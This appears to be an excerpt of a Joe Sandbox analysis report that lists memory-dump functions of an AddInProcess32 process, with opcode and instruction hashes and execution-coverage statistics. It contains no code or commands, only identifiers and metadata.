                                                                                                                                                                                                                                                    • Instruction ID: e0f6fe265a03e7ccb380341689a1065ebbaca68382d31ed0a3a02cc3cf36862d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 897a414ec7c03c935995e7b0874e68b30cef580d7fc720e9294a25b6a5edcadd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2318F30E106099FCB15DF68C8946AFBBB2FF89300F148A1AE806E7350DB71A942CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B2098 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 463e228ac9c9669d61f1366644263ac837b2163a2e60f64b24f6e57ff3199232
                                                                                                                                                                                                                                                    • Instruction ID: 88891fa9a527d74915b7de07e5893a03e33420496ca00359ef6a2046f5b3ad9b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 463e228ac9c9669d61f1366644263ac837b2163a2e60f64b24f6e57ff3199232
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2315230E106099BCB15DFA4C8956AFBBB2FF89300F14991AE916E7340EF71AD46CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3AA9 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 75dbd6f6723e2480a1af2409f7726acfafb568dbd2afa36e54cff9b4507609d5
                                                                                                                                                                                                                                                    • Instruction ID: 40d60b43c2361c00e5a64352156544eddd0c3ff5994764b9744b24bf181820db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75dbd6f6723e2480a1af2409f7726acfafb568dbd2afa36e54cff9b4507609d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46216B75F046089FDB42DFA9E950BEEBBF5BB48310F148026E904E7395EB34D9448B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3AB8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b43469646bbdc18b9bbbebe1b19b8647be3927a2b500c9099929cad6c3325aa
                                                                                                                                                                                                                                                    • Instruction ID: c4ad42f599e991bc53b0608aaa1ef7a68e839888b2a185ea284140beb76848bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b43469646bbdc18b9bbbebe1b19b8647be3927a2b500c9099929cad6c3325aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE216B75F046149FDB42DF6AD880AEEBBF5FB48310F14802AE905E7345EB35D9018BA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0119D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1480765465.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_119d000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2f40b87f3b7b267e23bfe7d9ee258e21b43d1fdb4939d06d717aa02593f501ea
                                                                                                                                                                                                                                                    • Instruction ID: 61ed65af98872c3b78e2abc8f2f457113dd7fa20addff0f170c5f06511433569
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f40b87f3b7b267e23bfe7d9ee258e21b43d1fdb4939d06d717aa02593f501ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D12122B1604304DFDF19DF94E9C0B26BBA1FB84314F28C56DD80A0B246C33AD847CA62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B6D10 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cd11654ad503d150861737d227d4d3cc8f78ebd81699290a1cbec97ddf235718
                                                                                                                                                                                                                                                    • Instruction ID: c666c74100a151f3e514e0c104002fd1205b1ec8d2fa8dd7ccacff5e8fd40caf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd11654ad503d150861737d227d4d3cc8f78ebd81699290a1cbec97ddf235718
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C21A230B101189FDF54EB69E5546EEBBB7FB85350F25942AD505DB340DB31AC418BA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3BC8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 131e977ed18f40eb03514c0dc7ad347c52058633d312aecf2fcaaf9ab36bd366
                                                                                                                                                                                                                                                    • Instruction ID: 5b55dc042cf13236d2f3b18a4602fe94d482edbcb6cc83d533adc8fd0a50c111
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 131e977ed18f40eb03514c0dc7ad347c52058633d312aecf2fcaaf9ab36bd366
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE11A136B101289FCB659ABDC8246FF77E7BBC9350B00453AD406E7344DE25DC0287A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B5418 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ec4c21ae6c708563dd1803a35deb9aa0d52a581afbbde53ac5c77dbe54e91d27
                                                                                                                                                                                                                                                    • Instruction ID: b1f3625f2e7b8346e74309e7cff72a5a537a651a5ab74df84d99d95d972fd827
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec4c21ae6c708563dd1803a35deb9aa0d52a581afbbde53ac5c77dbe54e91d27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE119331A007099FCB65CFA5DD84AAFFBB2FF88204F14892AE15593650D770A945CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3DFF Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bfa72b00027d85a5e9c419a552ae536242a21d519b06e0fac94ecd57e9c9c45f
                                                                                                                                                                                                                                                    • Instruction ID: 07c4efe4db05880cd37da485658169dc61a452561cd4775fb6d09ebd51ddf301
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa72b00027d85a5e9c419a552ae536242a21d519b06e0fac94ecd57e9c9c45f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F701D431B105101BDB629A6DD45576FB7EADBCA710F14953AE50AC7380DE25EC4283E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BA2F8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: da32abf5078c55e4b809063e69d7d1a8ce976df01d246f71460b2d8c743079de
                                                                                                                                                                                                                                                    • Instruction ID: ce2653b7c418e01a558a20290b33a5b83bfcfbe3c1f93cfc94b93a6359a31e4b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da32abf5078c55e4b809063e69d7d1a8ce976df01d246f71460b2d8c743079de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D012831B140005FC761AA6CD465BAF77D6EB8A320F58A925E10AC7740DE21DC828390
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3880 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 48e3247d7a302728fb1ac2c621e1c783b983ab9c993cce30c6ed02294f95139e
                                                                                                                                                                                                                                                    • Instruction ID: 6eff65313911993f78c28b11c90e09990bc6841840ed0bcf208562bceff81195
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48e3247d7a302728fb1ac2c621e1c783b983ab9c993cce30c6ed02294f95139e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B021C0B5D01219ABCB10DF9AD884BDEFBB4FB48214F10812AE918A7300D774A954CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BED80 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a884297d897859d11744a1c318a122697d121549f3f5bc9901b9c48699702cc5
                                                                                                                                                                                                                                                    • Instruction ID: 4c5be7893be1d32539a731792043bfd168c3cb40d0f72be9c2500857f9f2cfd3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a884297d897859d11744a1c318a122697d121549f3f5bc9901b9c48699702cc5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901DF30B045102BCB62963CE856BBF2BD7DBCA250F10952AF10AC7381EE60DC0243A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0119D02B Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1480765465.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_119d000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                                                                                                                                                    • Instruction ID: a95968ed3c301e69a51b96b25b6d1342fcc42228e8ee000205966d53770440b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811BB76504280CFDF16CF58E5C4B15BFB1FB84314F28C6AAD8494B656C33AD44ACB62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3BB7 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d426f252cd02c511c3b2300752a0a3efa1b0ed269e951de31c506d5cfaca16f5
                                                                                                                                                                                                                                                    • Instruction ID: 977710ba8b824bdfe8582ea1e387380767d5c948bd533c2ae59bf65e398099ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d426f252cd02c511c3b2300752a0a3efa1b0ed269e951de31c506d5cfaca16f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F01B136B1022C9FCB55AEADDC246EF77AABB88310F04453AD909D7344EF259D1287A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3888 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 77f752a2b1021aa7bb957c7bf7529628e49ae6caaab694959fc6a842af13a215
                                                                                                                                                                                                                                                    • Instruction ID: 90da372112f7f960d7db3db5a91a33450df8c82364306acb17d9eb134fadbc00
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77f752a2b1021aa7bb957c7bf7529628e49ae6caaab694959fc6a842af13a215
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA11BDB5D01259AFDB10DF9AD884ADEFBB8FB48314F10812AE918A7340C774A954CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B3E10 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b2a3c040ea3a92a8bc9518eb0dde36dbb1158d5ee4da730a18edf2a73f7ce748
                                                                                                                                                                                                                                                    • Instruction ID: 36a593f8bf9be771c169a519b10033997a99b83deb0b0145222a5d204c3a6586
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2a3c040ea3a92a8bc9518eb0dde36dbb1158d5ee4da730a18edf2a73f7ce748
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901F430B104101BDB629A6ED455B6FB7DBDBCA720F10983BE10AC7380DE65DC4283E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BED90 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 60f0245f667e6d0ebdc7bac8cc6f606641a8b4c1600a5da1bdf3cc9e17b09220
                                                                                                                                                                                                                                                    • Instruction ID: bfcbfee2ae8b1be352e876de0c2ae3605e0998dc0eae2c9091eaaeeb5f3fcd7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60f0245f667e6d0ebdc7bac8cc6f606641a8b4c1600a5da1bdf3cc9e17b09220
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D130B104101BCB62967CD455BBF77DADBC9760F10993AE10BC7380DE61DC0243A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BA308 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3f9ac67be2f9a01188308cce65f0ffdd37c479b004f9345448201b277f59049a
                                                                                                                                                                                                                                                    • Instruction ID: eb4d89b4a552850d762712f960085346ccbff9b4a688fa20952d86d976668880
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f9ac67be2f9a01188308cce65f0ffdd37c479b004f9345448201b277f59049a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3701F430B101101FCB61EA6CD465B6F77D6EB8A320F10A929E10AC7344DE21DC8287A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BC7C8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 59e2352ca8c2f5da688f5bf59bb55c144cbd061219db907609f6955cb7e453a0
                                                                                                                                                                                                                                                    • Instruction ID: a6ae9b0bd7dcc457725f96e85e18e13723ad721e09bd48e0704514e9787dbd04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59e2352ca8c2f5da688f5bf59bb55c144cbd061219db907609f6955cb7e453a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91F0EC32F20628DBDB646565DC815DBB37AF784358F00443AED01E7744D771AC0187D0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B6469 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7e7b4fe1bcac4756c872837065a4ba0e36321224bf66d838fea918149c962ea3
                                                                                                                                                                                                                                                    • Instruction ID: e7ba69139c974393598fa4f5cc552387108ba48ff5d8357abd6d8ecbb36862aa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e7b4fe1bcac4756c872837065a4ba0e36321224bf66d838fea918149c962ea3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48E0D870D44108AFCF51DFA4DA457EE77B9EB01204F218CE6D408C7342F236DA118750
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B4A59 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5fe340f08338b12c1c327ea6e2a51cd17153a567472a2ab1e3ae64f66df07fdc
                                                                                                                                                                                                                                                    • Instruction ID: a2d380b65fe21bdfb2608419ddc303093cee689cbea093a9b09b6d87e6d9556b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe340f08338b12c1c327ea6e2a51cd17153a567472a2ab1e3ae64f66df07fdc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F0B731A54119EBDB54DB94E859BAE7BB2BF88701F20012AE002A7285CB741D42CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B6478 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction ID: f1b104941eb009c533f1c395be763e93c49f723540fb7325b9d2e21287ead981
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00E0C271E10108ABDF51CEB1CA0579BB3ADD701204F2188A6D408C7341F272DA0183A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:56
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
